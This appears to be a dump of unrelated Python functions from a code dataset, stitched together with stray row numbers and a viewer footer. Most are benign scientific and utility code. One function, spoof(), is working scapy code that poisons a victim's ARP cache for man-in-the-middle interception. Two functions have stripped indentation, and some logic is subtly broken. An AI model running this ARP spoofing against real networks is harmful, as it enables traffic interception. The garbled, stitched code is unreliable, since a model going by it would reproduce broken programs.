                       batchFileIn=None, batchFileOut=None, noRun=False, noDelete=False):
    """
    Create a single GCAM XML batch file that runs multiple queries, placing
    each query's results in a file named {queryName}-{scenario}.csv.

    :param scenario: (str) the name of the scenario to perform the query on
    :param queries: (list of str query names and/or Query instances)
    :param xmldb: (str) path to XMLDB, or '' to use in-memory DB
    :param queryPath: (str) a list of directories or XML filenames, separated
       by a colon (on Unix) or a semi-colon (on Windows)
    :param outputDir: (str) the directory in which to write the .CSV
       with query results, default is value of GCAM.OutputDir.
    :param regions: (iterable of str) the regions you want to include in the query
    :param regionMap: (dict-like) keys are the names of regions that should be rewritten.
        The value is the name of the aggregate region to map into.
    :param rewriteParser: (RewriteSetParser instance) parsed representation of
       rewriteSets.xml
    :param batchFileIn: (str) the name of a pre-formed batch file to run
    :param batchFileOut: (str) where to write output from batchFileIn, if given
    :param noRun: (bool) if True, print the command that would be executed, but
       don't run it.
    :param noDelete: (bool) if True, temporary files created by this function are
       not deleted (use for debugging)
    :return: none
    """
    # build the batch file first, then hand it to ModelInterface
    batch_file = createBatchFile(scenario, queries, xmldb=xmldb,
                                 queryPath=queryPath, outputDir=outputDir,
                                 regions=regions, regionMap=regionMap,
                                 rewriteParser=rewriteParser, noDelete=noDelete,
                                 batchFileIn=batchFileIn,
                                 batchFileOut=batchFileOut)
    runModelInterface(scenario, outputDir, xmldb=xmldb, batchFile=batch_file,
                      miLogFile=miLogFile, noDelete=noDelete, noRun=noRun)
def get_user_messages(user, index=0, number=0):
"""
返回指定user按时间倒序的从index索引开始的number个message
"""
if not user or user.is_anonymous or index < 0 or number < 0:
return tuple()
# noinspection PyBroadException
try:
if index == 0 and number == 0:
all_message = user.messages.all()
else:
all_message = user.messages.all()[index:index+number]
except Exception as e:
all_message = tuple()
return all_message | 5,333,587 |
def third_party_apps_default_dc_modules_and_settings(klass):
    """
    Decorator for DefaultDcSettingsSerializer class.
    Updates modules and settings fields defined in installed third party apps.
    """
    logger.info('Loading third party apps DEFAULT DC modules and settings.')
    for third_party_app, app_dc_settings in get_third_party_apps_serializer_settings():
        # an app may define modules, settings, both, or neither
        if hasattr(app_dc_settings, 'DEFAULT_DC_MODULES'):
            _update_serializer_modules(third_party_app, app_dc_settings.DEFAULT_DC_MODULES, klass, default_dc=True)
        else:
            logger.info('Skipping app: %s does not have any DEFAULT DC modules defined.', third_party_app)
        if hasattr(app_dc_settings, 'DEFAULT_DC_SETTINGS'):
            _update_serializer_settings(third_party_app, app_dc_settings, klass, default_dc=True)
        else:
            logger.info('Skipping app: %s does not have any DEFAULT DC settings defined.', third_party_app)
    return klass
def test_nonlocals_set(nonlocals):
    """Test setting attribute through setatttr and setitem.
    """
    # plain attribute: attribute assignment and item assignment both write
    nonlocals.attribute1 = 3
    assert nonlocals.attribute1 == 3
    nonlocals['attribute1'] = 4
    assert nonlocals.attribute1 == 4
    # writable property behaves the same through both protocols
    nonlocals.prop2 = 3
    assert nonlocals.prop2 == 3
    nonlocals['prop2'] = 4
    assert nonlocals.prop2 == 4
    nonlocals.top = 1
    assert nonlocals.top == 1
    nonlocals.write_only = 1
    # deleting the instance attribute exposes the fallback value
    # (presumably a class-level default of 1 on the fixture -- TODO confirm)
    del nonlocals.attribute1
    assert nonlocals.attribute1 == 1
    # read-only property: assignment must raise
    with pytest.raises(AttributeError):
        nonlocals.prop1 = 1
    # deleting a name that was never set must raise
    with pytest.raises(AttributeError):
        del nonlocals.unknown
    # write in the absence of an instance dict
    del nonlocals.owner.__dict__
    nonlocals.attribute1 = 3
    assert nonlocals.attribute1 == 3
    # non-string keys are rejected by item assignment
    with pytest.raises(TypeError):
        nonlocals[1] = 1
    # Test setting a non-data descriptor
    nonlocals.owner = 1
    assert nonlocals.owner == 1
def split_lvis(
    n_experiences: int,
    train_transform=None,
    eval_transform=None,
    shuffle=True,
    root_path: Union[str, Path] = None,
):
    """
    Creates the example Split LVIS benchmark.
    This is a toy benchmark created only to show how a detection benchmark can
    be created. It was not meant to be used for research purposes!
    :param n_experiences: The number of train experiences to create.
    :param train_transform: The train transformation.
    :param eval_transform: The eval transformation.
    :param shuffle: If True, the dataset will be split randomly
    :param root_path: The root path of the dataset. Defaults to None,
        which means that the default path will be used.
    :return: A :class:`DetectionScenario` instance.
    """
    train_dataset = LvisDataset(root=root_path, train=True)
    val_dataset = LvisDataset(root=root_path, train=False)
    # FIX: set.union returns a NEW set; the original discarded its result, so
    # categories appearing only in the validation split were never counted.
    # Use the in-place update instead.
    all_cat_ids = set(train_dataset.lvis_api.get_cat_ids())
    all_cat_ids.update(val_dataset.lvis_api.get_cat_ids())
    return split_detection_benchmark(
        n_experiences=n_experiences,
        train_dataset=train_dataset,
        test_dataset=val_dataset,
        n_classes=len(all_cat_ids),
        train_transform=train_transform,
        eval_transform=eval_transform,
        shuffle=shuffle,
    )
def spoof(target_ip, host_ip, verbose=True):
    """
    Spoofs `target_ip` saying that we are `host_ip` by poisoning the
    target's ARP cache with a forged 'is-at' reply.
    """
    # resolve the victim's MAC so the forged reply is addressed directly
    target_mac = get_mac(target_ip)
    poison = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
    send(poison, verbose=0)
    if not verbose:
        return
    # get the MAC address of the default interface we are using
    self_mac = ARP().hwsrc
    print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
def compute_log_ksi_normalized(log_edge_pot, #'(t-1,t)',
                               log_node_pot, # '(t, label)',
                               T,
                               n_labels,
                               log_alpha,
                               log_beta,
                               temp_array_1,
                               temp_array_2):
    """ to obtain the two-slice posterior marginals p(y_t = i, y_t+1 = j| X_1:T) = normalized ksi_t,t+1(i,j)

    Runs the forwards (alpha) and backwards (beta) passes, then combines
    them per MLAPP eq 17.67 and normalizes each (i, j) slice in log space.
    Returns log_ksi of shape (T-1, n_labels, n_labels), where entry
    [t, i, j] is the normalized log two-slice marginal.
    NOTE(review): temp_array_1/temp_array_2 appear to be preallocated
    scratch buffers for the alpha/beta passes -- confirm their required
    shapes against compute_log_alpha/compute_log_beta.
    """
    # in the following, will index log_ksi only with t, to stand for log_ksi[t,t+1]. including i,j: log_ksi[t,i,j]
    # forwards and backwards messages over the whole chain
    log_alpha = compute_log_alpha(log_edge_pot, log_node_pot, T, n_labels, log_alpha, temp_array_1, temp_array_2)
    log_beta = compute_log_beta(log_edge_pot, log_node_pot, T, n_labels, log_beta, temp_array_1, temp_array_2)
    log_ksi = np.empty((T-1, n_labels, n_labels))
    for t in range(T-1):
        psi_had_beta = log_node_pot[t+1,:] + log_beta[t+1, :] # represents psi_t+1 \hadamard beta_t+1 in MLAPP eq 17.67
        # start from the (shared) edge potentials, then add the messages
        log_ksi[t,:,:] = log_edge_pot
        for c in range(n_labels):
            for d in range(n_labels):
                log_ksi[t,c,d] += log_alpha[t,d] + psi_had_beta[c]
        # normalize current ksi[t,:,:] over both dimensions. This is not required of ksi, strictly speaking, but the output of the function needs to be normalized, and it's cheaper to do it in-place on ksi than to create a fresh variable to hold the normalized values
        log_ksi[t,:,:] -= lse_numba_2d(log_ksi[t,:,:])
    return log_ksi
def flushcache():
    """
    CLI: Delete all cached data (if cache is activated)
    Usage: "flask flushcache"
    """
    if not read_config("CACHE"):
        echo("Cache inactive, unable to flush")
        return
    echo("Cache successfully flushed")
    CACHE.clear()
def parse_args():
    """Parse input arguments."""
    parser = argparse.ArgumentParser(
        description="Map gleason data to standard format.")
    parser.add_argument(
        "-d", "--data_path", type=Path, required=True,
        help="Path to folder with the data.")
    parser.add_argument(
        "-n", "--n_jobs", type=int, required=True,
        help="Number of jobs to run in parallel.")
    return parser.parse_args()
def test_whitepaper_model():
    """Exercise the whitepaper 'measurement' model: ASL data is generated
    with the DRO and then quantified with the white paper equation."""
    # Shared timing values; the quantification post-label delay is derived
    # from them so the two parameter sets stay consistent.
    label_duration = 1.8
    signal_time = 3.6
    dro_config = {
        "lambda_blood_brain": 0.9,
        "t1_arterial_blood": 1.65,
        "label_efficiency": 0.85,
        "asl_context": "m0scan control label control label control label control label",
        "desired_snr": 1e10,
        "acq_matrix": [64, 64, 20],
        "label_duration": label_duration,
        "signal_time": signal_time,
        "perfusion_rate": {
            "scale": 1.0,
        },
        "ground_truth": "hrgt_icbm_2009a_nls_3t",
    }
    quant_config = {
        "label_type": "pcasl",
        "model": "whitepaper",
        "label_duration": label_duration,
        "post_label_delay": signal_time - label_duration,
        "label_efficiency": 0.85,
        "lambda_blood_brain": 0.9,
        "t1_arterial_blood": 1.65,
    }
    results = whitepaper_model(dro_config, quant_config)
def process_file(filename, f, num=float('Inf')):
"""read the given filename and extract information;
for each film, call f() with string arguments:
actor, date, title, role """
fp = open_gunzip(filename)
i = 0
# skip over the header until you get to the following magic line
for line in fp:
if line.strip() == '---- ------':
break
# regexp to recognize actor, tabs, movie
split1 = re.compile('([^\t]*)\t*(.*)', re.UNICODE)
# regexp to recognize title, date, role
split2 = re.compile('([^\(]*)\s*(\([^\)]*\))[^\[]*(\[[^\]]*\])?',
re.UNICODE)
# regexp to recognize television (TV), video (V), video game (VG)
video = re.compile('\(T?V|VG\)', re.U)
actor = ''
for line in fp:
line = line.rstrip()
if line == '': continue
if line[0] == '-----': break
# split the line into actor info and movie info;
# keep track of the current actor
ro = split1.match(line)
if ro:
new_actor, info = ro.groups()
if new_actor:
actor = new_actor
else:
print 'BAD1', line
continue
# skip television shows (titles in quotation marks)
if info[0] == '"':
continue
# skip made for TV and straight to video
if video.search(info):
continue
# split the info into title, date and role
ro = split2.match(info)
if ro:
title, date, role = ro.groups()
if date == None:
print 'BAD2', line
continue
f(actor, date, title, role)
i += 1
if i > num: break
else:
print 'BAD3', line
continue
stat = fp.close() | 5,333,596 |
def _deserialize_union(x: Any, field_type: Type) -> Any:
    """Deserialize a value against the member types of a Union field.

    Each member type of the Union is tried in declaration order; the first
    one that deserializes without error wins.

    Args:
        x (Any): value to be deserialized.
        field_type (Type): the Union type whose members are attempted.

    Returns:
        [Any]: the first successful deserialization, or ``x`` unchanged when
        no member type accepts it.
    """
    for candidate in field_type.__args__:
        try:
            x = _deserialize(x, candidate)
        except ValueError:
            # this member type did not match — try the next one
            continue
        # stop after first matching type in Union
        break
    return x
def read_simplest_expandable(expparams, config):
    """
    Read expandable parameters of the form ``param_1`` from a config file.

    Parameters
    ----------
    expparams : dict, dict.keys, set, or alike
        The parameter names that should be considered as expandable.
        Usually, this is a module subdictionary of `type_simplest_ep`.
    config : dict, dict.keys, set, or alike
        The user configuration file.

    Returns
    -------
    set of str
        The parameters in `config` that comply with `expparams`.
    """
    matched = set()
    for key in config:
        parts = key.split("_")
        # only names shaped exactly like "<base>_<index>" qualify
        if len(parts) != 2:
            continue
        base, suffix = parts
        if suffix.isdigit() and base in expparams:
            matched.add(key)
    return matched
def rec_map_reduce_array_container(
        reduce_func: Callable[[Iterable[Any]], Any],
        map_func: Callable[[Any], Any],
        ary: ArrayOrContainerT) -> "DeviceArray":
    """Recursively map-reduce over an array container.

    :param reduce_func: associative callable that combines the mapped
        components of *ary* (and of every nested sub-container) if *ary* is a
        :class:`~arraycontext.ArrayContainer`.
    :param map_func: callable applied to each single array of type
        :class:`arraycontext.ArrayContext.array_types`; returns an array of
        the same type or a scalar.

    .. note::
        The traversal order is unspecified, and *reduce_func* may be applied
        to partial groups of components and then again (potentially multiple
        times) to their results, so only an associative *reduce_func*
        guarantees a sensible answer.  For instance, for a container holding
        two sub-containers with two arrays each, reducing each sub-container
        first and then reducing those partial results must produce the same
        value as reducing all four mapped leaf arrays in a single call.
    """
    def descend(node: ArrayOrContainerT) -> ArrayOrContainerT:
        try:
            components = serialize_container(node)
        except NotAnArrayContainerError:
            # *node* is a leaf array: apply the map function directly.
            return map_func(node)
        return reduce_func([descend(subary) for _, subary in components])

    return descend(ary)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.